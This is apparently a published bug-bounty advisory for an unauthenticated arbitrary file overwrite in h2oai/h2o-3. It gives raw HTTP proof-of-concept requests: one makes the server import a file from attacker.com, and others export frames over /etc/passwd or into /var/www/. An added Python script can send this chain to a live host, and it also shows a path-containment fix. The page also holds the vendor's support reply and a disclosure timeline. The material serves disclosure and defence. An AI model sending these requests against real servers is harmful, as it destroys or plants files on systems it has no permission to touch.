Remote Arbitrary System File Overwrite in h2oai/h2o-3

Valid

Reported on

Jun 9th 2023


Description

Remote unauthenticated attackers can overwrite arbitrary server files with attacker-controllable data.

Proof of Concept

Import attacker-controlled data into the cluster with ImportFiles (the h2o server fetches the URL itself, so no prior access to the host is needed):

GET /3/ImportFiles?path=http://attacker.com/somefile HTTP/1.1
Host: 127.0.0.1:54321
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:54321/flow/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Then export the imported frame to any path writable by the OS user who ran h2o.init(); force=true makes the export overwrite an existing file instead of refusing:

POST /3/Frames/someattackerimportedframename/export?path=/etc/passwd&force=true HTTP/1.1
Host: 127.0.0.1:54321
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:54321/flow/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 0

The data the attacker controls is not entirely arbitrary. h2o serializes the frame to disk in one of its export formats (CSV, XLS, etc.), so in the CSV case the attacker's content lands as quoted cells beneath a header row, and the first bytes of the written file are "C1" (h2o's default name for a column that had no header). The overwrite itself is complete, but a target that must parse the result has to tolerate that header and quoting.
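The two-request chain above as a script, together with the path check the export endpoint was missing. This is an added example, not code from the report or from the h2o-3 project: the host, the attacker URL, the frame key and the export root directory are placeholders, and is_safe_export_path is a hypothetical fix illustrating the containment rule rather than h2o's actual patch.

```python
"""Added example (not part of the original report): build the ImportFiles ->
Frames/export request pair described above, and show the path containment
check that a fixed export endpoint should apply.  All hosts, URLs, frame keys
and directories below are assumed placeholders."""
import os
import urllib.parse
import urllib.request

H2O_BASE = "http://127.0.0.1:54321"               # assumed: default h2o-3 listen address
REMOTE_FILE = "http://attacker.example/somefile"  # assumed attacker-hosted payload file
FRAME_KEY = "nfs://malicioushtml"                 # assumed key of the imported frame
TARGET = "/etc/passwd"                            # file the PoC overwrites


def import_request(base: str, remote_url: str) -> urllib.request.Request:
    """Step 1: GET /3/ImportFiles?path=<url>; the h2o server fetches the URL."""
    qs = urllib.parse.urlencode({"path": remote_url})
    return urllib.request.Request(f"{base}/3/ImportFiles?{qs}", method="GET")


def export_request(base: str, frame_id: str, target_path: str) -> urllib.request.Request:
    """Step 2: POST /3/Frames/<frame>/export?path=<file>&force=true.

    force=true is what turns 'write a new file' into 'overwrite an existing one'.
    The frame key is percent-encoded because keys such as nfs://... contain '/'.
    """
    qs = urllib.parse.urlencode({"path": target_path, "force": "true"})
    frame = urllib.parse.quote(frame_id, safe="")
    return urllib.request.Request(f"{base}/3/Frames/{frame}/export?{qs}", data=b"", method="POST")


def run_chain(base: str, remote_url: str, frame_id: str, target_path: str) -> list:
    """Send both requests in order; only use against a host you are authorised to test."""
    statuses = []
    for req in (import_request(base, remote_url), export_request(base, frame_id, target_path)):
        with urllib.request.urlopen(req, timeout=10) as resp:
            statuses.append((req.get_method(), req.full_url, resp.status))
    return statuses


def is_safe_export_path(requested: str, export_root: str) -> bool:
    """Hypothetical server-side fix: the canonical export target must stay inside
    a configured export directory.  Absolute paths, '..' segments and symlinks are
    all resolved before the comparison, and a sibling directory whose name merely
    starts with the root (exports-other/) is rejected by the trailing separator."""
    root = os.path.realpath(export_root)
    target = os.path.realpath(requested if os.path.isabs(requested) else os.path.join(root, requested))
    return target == root or target.startswith(root + os.sep)


if __name__ == "__main__":
    # Dry run: print the requests the PoC sends without contacting any server.
    for req in (import_request(H2O_BASE, REMOTE_FILE), export_request(H2O_BASE, FRAME_KEY, TARGET)):
        print(req.get_method(), req.full_url)
    # What a fixed endpoint would decide for the PoC path versus a normal export.
    print(TARGET, "allowed:", is_safe_export_path(TARGET, "/var/lib/h2o/exports"))
    print("out.csv", "allowed:", is_safe_export_path("out.csv", "/var/lib/h2o/exports"))
```

The dry run reproduces the PoC URLs byte for byte; run_chain is the live version. The containment check is the minimum a server-side fix needs: comparing the raw string against a prefix, or checking only for "..", would still let /etc/passwd or a symlink inside the export directory escape.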

Developers were contacted 06/09/2023:

From: H2O Support, 5:02 PM, to me

Dear Dan McInerney,

We would like to acknowledge that we have received your request for support and a ticket has been created. A support representative will be reviewing your request and will send you a personal response.
Your ticket id is: [#105583]


To view the status of the ticket or add comments, please visit
https://support.h2o.ai/helpdesk/tickets/105583

Your problem description is as below:

The "Export" functionality of Frames has no restrictions on location and can completely overwrite local server files. This can lead to a remote server denial of service by overwriting system files, or to planting backdoors on the server. The attacker doesn't have complete control over the output, as it is forced to be written in formats like CSV/XLS/etc, but some configuration files and services may still be able to parse the h2o CSV format and be arbitrarily exploited. An example of attempting to write malformed malicious HTML to the HTML root can be seen below.

POST /3/Frames/nfs%3A%2F%2Fmalicioushtml/export HTTP/1.1
Host: 127.0.0.1:54321
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Origin: http://127.0.0.1:54321
Connection: close
Referer: http://127.0.0.1:54321/flow/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

path=/var/www/&force=true


Thank you for your patience.

Sincerely,
H2O.ai Support Team

Impact

Overwriting arbitrary files the h2o process can write, causing a denial of service, or exploiting services that consume one of the file formats h2o can export (such as CSV or XLS).

We are processing your report and will contact the h2oai/h2o-3 team within 24 hours. 8 months ago
We have contacted a member of the h2oai/h2o-3 team and are waiting to hear back 8 months ago
Dan McInerney modified the Severity from Critical (10) to Critical (9.3) 4 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Marcello validated this vulnerability 4 months ago
danmcinerney has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
This vulnerability has now been published 2 months ago